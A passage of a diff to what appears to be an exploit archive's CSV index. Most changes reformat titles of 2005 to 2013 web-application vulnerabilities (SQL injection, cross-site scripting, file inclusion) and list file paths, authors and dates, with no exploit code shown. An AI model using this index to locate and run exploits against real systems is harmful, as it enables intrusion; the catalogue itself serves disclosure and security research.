Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 +25156,platforms/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusions",2005-02-24,"Maksymilian Arciemowicz",php,webapps,0 25158,platforms/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,php,webapps,0 25159,platforms/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,jsp,webapps,0 25160,platforms/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",php,webapps,0 @@ -28088,8 +28089,8 @@ id,file,description,date,author,platform,type,port 25170,platforms/php/webapps/25170.cpp,"phpBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,php,webapps,0 25172,platforms/php/webapps/25172.txt,"PostNuke Phoenix 0.7x - CATID Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 25173,platforms/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - SHOW Parameter SQL Injection",2005-02-28,"Maksymilian Arciemowicz",php,webapps,0 -25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - mod.php Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 -25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Parameter Cross-Site Scripting",2005-03-01,Lostmon,php,webapps,0 +25174,platforms/php/webapps/25174.txt,"PHPCOIN 1.2 - 'mod.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps,0 +25175,platforms/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,php,webapps,0 25176,platforms/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - SendPM.php Directory Traversal",2005-03-01,Raven,php,webapps,0 25177,platforms/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection",2005-03-01,FraMe,php,webapps,0 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0 @@ -28103,10 +28104,10 @@ id,file,description,date,author,platform,type,port 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0 25208,platforms/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",php,webapps,0 25212,platforms/php/webapps/25212.txt,"UBBCentral UBB.Threads 6.0 - 'editpost.php' SQL Injection",2005-03-11,"ADZ Security Team",php,webapps,0 -25213,platforms/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - viewall.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 -25214,platforms/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - category.php start Parameter SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 -25215,platforms/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - viewall.php start Parameter Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps,0 -25216,platforms/php/webapps/25216.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - category.php start Parameter Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps,0 +25213,platforms/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 +25214,platforms/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' SQL Injection",2005-03-12,sp3x@securityreason.com,php,webapps,0 +25215,platforms/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps,0 +25216,platforms/php/webapps/25216.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,php,webapps,0 25217,platforms/php/webapps/25217.html,"HolaCMS 1.2/1.4.x Voting Module - Remote File Corruption",2005-03-12,"Virginity Security",php,webapps,0 25220,platforms/php/webapps/25220.txt,"PABox 2.0 - Post Icon HTML Injection",2005-03-14,Rift_XT,php,webapps,0 25222,platforms/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x Voting Module - Directory Traversal Remote File Corruption",2005-03-13,"Virginity Security",php,webapps,0 @@ -28123,7 +28124,7 @@ id,file,description,date,author,platform,type,port 25235,platforms/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",php,webapps,0 25236,platforms/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",php,webapps,0 25237,platforms/php/webapps/25237.txt,"RunCMS 1.1 - Database Configuration Information Disclosure",2005-03-18,"Majid NT",php,webapps,0 -25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - avatar.php img Parameter Cross-Site Scripting",2005-03-19,Romano,php,webapps,0 +25239,platforms/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - 'avatar.php?img' Cross-Site Scripting",2005-03-19,Romano,php,webapps,0 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - 'register.php' login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 - 'Setuser.php' HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 - 'Highlight.php' File Disclosure",2005-03-19,"Majid NT",php,webapps,0 @@ -28139,14 +28140,14 @@ id,file,description,date,author,platform,type,port 25252,platforms/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",asp,webapps,0 25253,platforms/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - upload.asp Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",asp,webapps,0 25254,platforms/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - myFiles.asp Unauthenticated File Manipulation",2005-03-21,"farhad koosha",asp,webapps,0 -25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-03-22,"James Bercegay",php,webapps,0 +25257,platforms/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"James Bercegay",php,webapps,0 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php' act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25262,platforms/php/webapps/25262.txt,"Interspire ArticleLive 2005 - NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 - msg.php Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 -25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - membres.php mt Parameter Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 -25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 +25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 - 'membres.php?mt' Cross-Site Scripting",2005-03-23,"benji lemien",php,webapps,0 +25265,platforms/php/webapps/25265.txt,"PHPSysInfo 2.0/2.3 - 'sensor_program' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25266,platforms/php/webapps/25266.txt,"PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting",2005-03-23,"Maksymilian Arciemowicz",php,webapps,0 25267,platforms/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",php,webapps,0 25269,platforms/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,jsp,webapps,0 @@ -28154,9 +28155,9 @@ id,file,description,date,author,platform,type,port 25271,platforms/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - main.php Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",php,webapps,0 25272,platforms/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,php,webapps,0 25273,platforms/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,php,webapps,0 -25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - review.php Multiple Parameter Cross-Site Scripting",2005-03-25,mircia,php,webapps,0 -25278,platforms/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - pages.php idpages Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 -25279,platforms/php/webapps/25279.txt,"ESMI PayPal StoreFront 1.7 - products1.php id2 Parameter SQL Injection",2005-03-26,Dcrab,php,webapps,0 +25276,platforms/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - 'review.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-25,mircia,php,webapps,0 +25278,platforms/php/webapps/25278.sh,"ESMI PayPal StoreFront 1.7 - 'pages.php?idpages' SQL Injection",2005-03-26,Dcrab,php,webapps,0 +25279,platforms/php/webapps/25279.txt,"ESMI PayPal StoreFront 1.7 - 'products1.php?id2' SQL Injection",2005-03-26,Dcrab,php,webapps,0 25280,platforms/php/webapps/25280.txt,"ESMI PayPal StoreFront 1.7 - Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0 25282,platforms/php/webapps/25282.txt,"Nuke BookMarks 0.6 - Marks.php Full Path Disclosure",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 25283,platforms/php/webapps/25283.txt,"Nuke BookMarks 0.6 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0 @@ -28165,26 +28166,26 @@ id,file,description,date,author,platform,type,port 25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition - Remote File Inclusion",2005-03-26,Dcrab,php,webapps,0 25292,platforms/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,hardware,webapps,0 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80 -25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI redirection",2005-03-28,CorryL,php,webapps,0 +25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' URI redirection",2005-03-28,CorryL,php,webapps,0 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 25301,platforms/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 -25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 +25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0 33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 -33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 -25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 -25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 - showmembers.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 -25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 - Slideshow.php photo Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 -25311,platforms/php/webapps/25311.txt,"PhotoPost Pro 5.1 - showmembers.php sl Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 -25312,platforms/php/webapps/25312.txt,"PhotoPost Pro 5.1 - showphoto.php photo Parameter SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 +33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - 'Administration Interface admin/cmdshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 +33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - 'Administration Interface admin/sqlshell.php?PATH_INFO' Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0 +25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - 'showgallery.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 +25309,platforms/php/webapps/25309.txt,"PhotoPost Pro 5.1 - 'showmembers.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0 +25310,platforms/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0 +25311,platforms/php/webapps/25311.txt,"PhotoPost Pro 5.1 - 'showmembers.php?sl' SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 +25312,platforms/php/webapps/25312.txt,"PhotoPost Pro 5.1 - 'showphoto.php?photo' SQL Injection",2005-03-28,"Diabolic Crab",php,webapps,0 25313,platforms/asp/webapps/25313.txt,"ACS Blog 0.8/0.9/1.0/1.1 - 'Name' HTML Injection",2005-03-28,"Dan Crowley",asp,webapps,0 25314,platforms/php/webapps/25314.txt,"The Includer 1.0/1.1 - Remote File Inclusion",2005-03-29,"hoang yen",php,webapps,0 25315,platforms/php/webapps/25315.html,"Chatness 2.5 - 'Message Form' HTML Injection",2005-03-29,3nitro,php,webapps,0 25316,platforms/php/webapps/25316.txt,"CPG Dragonfly 9.0.2.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-29,mircia,php,webapps,0 25317,platforms/php/webapps/25317.txt,"UApplication Ublog 1.0.x - Cross-Site Scripting",2005-03-29,"PersianHacker Team",php,webapps,0 -25318,platforms/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 - ad_click.asp banner_id Parameter SQL Injection",2005-03-29,"Diabolic Crab",asp,webapps,0 +25318,platforms/asp/webapps/25318.txt,"Iatek IntranetApp 2.3 - 'ad_click.asp?banner_id' SQL Injection",2005-03-29,"Diabolic Crab",asp,webapps,0 25320,platforms/php/webapps/25320.txt,"Lighthouse Development Squirrelcart 1.5.5 - SQL Injection",2005-03-29,"Diabolic Crab",php,webapps,0 25323,platforms/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,php,webapps,0 25324,platforms/asp/webapps/25324.txt,"ASP-DEV XM Forum RC3 - IMG Tag Script Injection",2005-03-31,Zinho,asp,webapps,0 @@ -28205,26 +28206,26 @@ id,file,description,date,author,platform,type,port 25345,platforms/php/webapps/25345.txt,"phpBB 2.0.13 Linkz Pro Module - SQL Injection",2005-04-06,"LovER BOY",php,webapps,0 25346,platforms/asp/webapps/25346.txt,"Active Auction House - 'default.asp' Multiple SQL Injections",2005-04-06,Dcrab,asp,webapps,0 25347,platforms/asp/webapps/25347.txt,"Active Auction House - ItemInfo.asp SQL Injection",2005-04-06,Dcrab,asp,webapps,0 -25348,platforms/asp/webapps/25348.txt,"Active Auction House - start.asp ReturnURL Parameter Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 -25349,platforms/asp/webapps/25349.txt,"Active Auction House - account.asp ReturnURL Parameter Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 +25348,platforms/asp/webapps/25348.txt,"Active Auction House - 'start.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 +25349,platforms/asp/webapps/25349.txt,"Active Auction House - 'account.asp?ReturnURL' Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25350,platforms/cgi/webapps/25350.txt,"WebWasher CSM 4.4.1 Build 752 Conf Script - Cross-Site Scripting",2005-04-06,"Oliver Karow",cgi,webapps,0 25351,platforms/asp/webapps/25351.txt,"Active Auction House - sendpassword.asp Multiple Cross-Site Scripting Vulnerabilities",2005-04-06,Dcrab,asp,webapps,0 25352,platforms/asp/webapps/25352.txt,"Active Auction House - WatchThisItem.asp Cross-Site Scripting",2005-04-06,Dcrab,asp,webapps,0 25354,platforms/php/webapps/25354.txt,"Ocean12 Membership Manager Pro - Cross-Site Scripting",2005-04-06,Zinho,php,webapps,0 -25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php add' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 -25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php product' Parameter Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25355,platforms/php/webapps/25355.txt,"CubeCart 2.0.x - 'index.php' Multiple Full Path Disclosures",2005-04-06,"John Cobb",php,webapps,0 +25356,platforms/php/webapps/25356.txt,"CubeCart 2.0.x - 'tellafriend.php?product' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25357,platforms/php/webapps/25357.txt,"CubeCart 2.0.x - 'view_cart.php?add' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 +25358,platforms/php/webapps/25358.txt,"CubeCart 2.0.x - 'view_product.php?product' Full Path Disclosure",2005-04-06,"John Cobb",php,webapps,0 25360,platforms/php/webapps/25360.txt,"PHP-Nuke 7.6 Web_Links Module - Multiple SQL Injections",2005-04-07,"Maksymilian Arciemowicz",php,webapps,0 25366,platforms/php/webapps/25366.txt,"PostNuke Phoenix 0.760 RC3 - OP Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25367,platforms/php/webapps/25367.txt,"PostNuke Phoenix 0.760 RC3 - Module Parameter Cross-Site Scripting",2005-04-08,Dcrab,php,webapps,0 25368,platforms/php/webapps/25368.txt,"PostNuke Phoenix 0.760 RC3 - SID Parameter SQL Injection",2005-04-08,Dcrab,php,webapps,0 25369,platforms/php/webapps/25369.txt,"RadScripts RadBids Gold 2.0 - 'index.php' read Parameter Traversal Arbitrary File Access",2005-04-09,Dcrab,php,webapps,0 25370,platforms/php/webapps/25370.txt,"RadScripts RadBids Gold 2.0 - 'index.php' mode Parameter SQL Injection",2005-04-09,Dcrab,php,webapps,0 -25371,platforms/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - faq.php farea Parameter Cross-Site Scripting",2005-04-09,Dcrab,php,webapps,0 -25372,platforms/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-04-09,Dcrab,php,webapps,0 -25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter Cross-Site Scripting",2005-04-09,kre0n,php,webapps,0 -25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - view.php id Parameter SQL Injection",2005-04-09,kre0n,php,webapps,0 +25371,platforms/php/webapps/25371.txt,"RadScripts RadBids Gold 2.0 - 'faq.php?farea' Cross-Site Scripting",2005-04-09,Dcrab,php,webapps,0 +25372,platforms/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-09,Dcrab,php,webapps,0 +25373,platforms/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,php,webapps,0 +25374,platforms/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,php,webapps,0 25376,platforms/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion",2005-04-10,"James Bercegay",php,webapps,0 25377,platforms/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - C_CODE Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 25378,platforms/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - Aid Parameter Cross-Site Scripting",2005-04-11,"James Bercegay",php,webapps,0 @@ -28242,7 +28243,7 @@ id,file,description,date,author,platform,type,port 25404,platforms/php/webapps/25404.txt,"phpBB Photo Album Module 2.0.53 - Album_Comment.php Cross-Site Scripting",2005-04-13,Dcrab,php,webapps,0 25405,platforms/php/webapps/25405.txt,"Getsimple CMS 3.2.1 - Arbitrary File Upload",2013-05-13,"Ahmed Elhady Mohamed",php,webapps,0 25409,platforms/php/webapps/25409.txt,"Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 -25410,platforms/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' Parameter SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 +25410,platforms/php/webapps/25410.txt,"Joomla! Component com_s5clanroster - 'id' SQL Injection",2013-05-13,AtT4CKxT3rR0r1ST,php,webapps,0 25412,platforms/ios/webapps/25412.txt,"Wireless Disk PRO 2.3 iOS - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,ios,webapps,0 25413,platforms/hardware/webapps/25413.txt,"Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities",2013-05-13,Vulnerability-Lab,hardware,webapps,0 25414,platforms/ios/webapps/25414.txt,"Wifi Album 1.47 iOS - Command Injection",2013-05-13,Vulnerability-Lab,ios,webapps,0 @@ -28260,14 +28261,14 @@ id,file,description,date,author,platform,type,port 25431,platforms/php/webapps/25431.pl,"Ariadne CMS 2.4 - Remote File Inclusion",2006-10-19,"Fidel Costa",php,webapps,0 25432,platforms/php/webapps/25432.txt,"phpBB Remote - mod.php SQL Injection",2005-04-16,"tom cruise",php,webapps,0 25433,platforms/php/webapps/25433.txt,"Datenbank Module For phpBB - Remote mod.php Cross-Site Scripting",2005-04-16,"tom cruise",php,webapps,0 -25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 -25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 - sitemgr-site/index.php category_id Parameter Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 -25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 - tts/index.php filter Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 +25434,platforms/php/webapps/25434.txt,"eGroupWare 1.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-18,"GulfTech Security",php,webapps,0 +25435,platforms/php/webapps/25435.txt,"eGroupWare 1.0 - 'sitemgr-site/index.php?category_id' Cross-Site Scripting",2005-04-18,"GulfTech Security",php,webapps,0 +25436,platforms/php/webapps/25436.txt,"eGroupWare 1.0 - 'tts/index.php?filter' SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25437,platforms/php/webapps/25437.txt,"eGroupWare 1.0 - 'index.php' cats_app Parameter SQL Injection",2005-04-18,"GulfTech Security",php,webapps,0 25438,platforms/php/webapps/25438.txt,"MVNForum 1.0 - Search Cross-Site Scripting",2005-04-18,"hoang yen",php,webapps,0 25440,platforms/php/webapps/25440.txt,"WordPress Plugin wp-FileManager - Arbitrary File Download",2013-05-14,ByEge,php,webapps,0 25441,platforms/php/webapps/25441.txt,"IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover",2013-05-14,"John JEAN",php,webapps,0 -25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php id' Parameter SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 +25442,platforms/php/webapps/25442.txt,"WHMCS 4.x - 'invoicefunctions.php?id' SQL Injection",2013-05-14,"Ahmed Aboul-Ela",php,webapps,0 25447,platforms/php/webapps/25447.txt,"Alienvault Open Source SIEM (OSSIM) 4.1.2 - Multiple SQL Injections",2013-05-14,RunRunLevel,php,webapps,0 25449,platforms/php/webapps/25449.txt,"UMI CMS 2.9 - Cross-Site Request Forgery",2013-05-14,"High-Tech Bridge SA",php,webapps,0 25451,platforms/php/webapps/25451.txt,"phpBB 1.x/2.0.x - (Knowledge Base Module) 'KB.php' SQL Injection",2005-04-13,deluxe@security-project.org,php,webapps,0 @@ -28284,16 +28285,16 @@ id,file,description,date,author,platform,type,port 25473,platforms/php/webapps/25473.txt,"PHP Labs - '.proFile' File URI Cross-Site Scripting",2005-04-20,sNKenjoi,php,webapps,0 25474,platforms/php/webapps/25474.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Rating.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 25475,platforms/php/webapps/25475.txt,"phpBB-Auction Module 1.0/1.2 - Auction_Offer.php SQL Injection",2005-04-20,sNKenjoi,php,webapps,0 -25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - 'default.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 -25477,platforms/asp/webapps/25477.txt,"DUportal Pro 3.4 - search.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 - 'inc_vote.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 -25479,platforms/asp/webapps/25479.txt,"DUportal Pro 3.4 - 'result.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 -25480,platforms/asp/webapps/25480.txt,"DUportal Pro 3.4 - 'cat.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 -25481,platforms/asp/webapps/25481.txt,"DUportal Pro 3.4 - 'detail.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 -25482,platforms/asp/webapps/25482.txt,"DUportal 3.1.2 - channel.asp iChannel Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 - inc_poll_voting.asp DAT_PARENT Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 - type.asp iCat Parameter SQL Injection",2005-04-20,Dcrab,asp,webapps,0 -25484,platforms/asp/webapps/25484.txt,"DUportal 3.1.2 - 'inc_rating.asp' Multiple Parameter SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25476,platforms/asp/webapps/25476.txt,"DUportal Pro 3.4 - 'default.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25477,platforms/asp/webapps/25477.txt,"DUportal Pro 3.4 - 'search.asp?iChannel' SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25478,platforms/asp/webapps/25478.txt,"DUportal Pro 3.4 - 'inc_vote.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25479,platforms/asp/webapps/25479.txt,"DUportal Pro 3.4 - 'result.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25480,platforms/asp/webapps/25480.txt,"DUportal Pro 3.4 - 'cat.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25481,platforms/asp/webapps/25481.txt,"DUportal Pro 3.4 - 'detail.asp' Multiple SQL Injections",2005-04-20,Dcrab,asp,webapps,0 +25482,platforms/asp/webapps/25482.txt,"DUportal 3.1.2 - 'channel.asp?iChannel' SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25483,platforms/asp/webapps/25483.txt,"DUportal 3.1.2 - 'inc_poll_voting.asp?DAT_PARENT' SQL Injection",2005-04-20,Dcrab,asp,webapps,0 +25485,platforms/asp/webapps/25485.txt,"DUportal 3.1.2 - 'type.asp?iCat' SQL 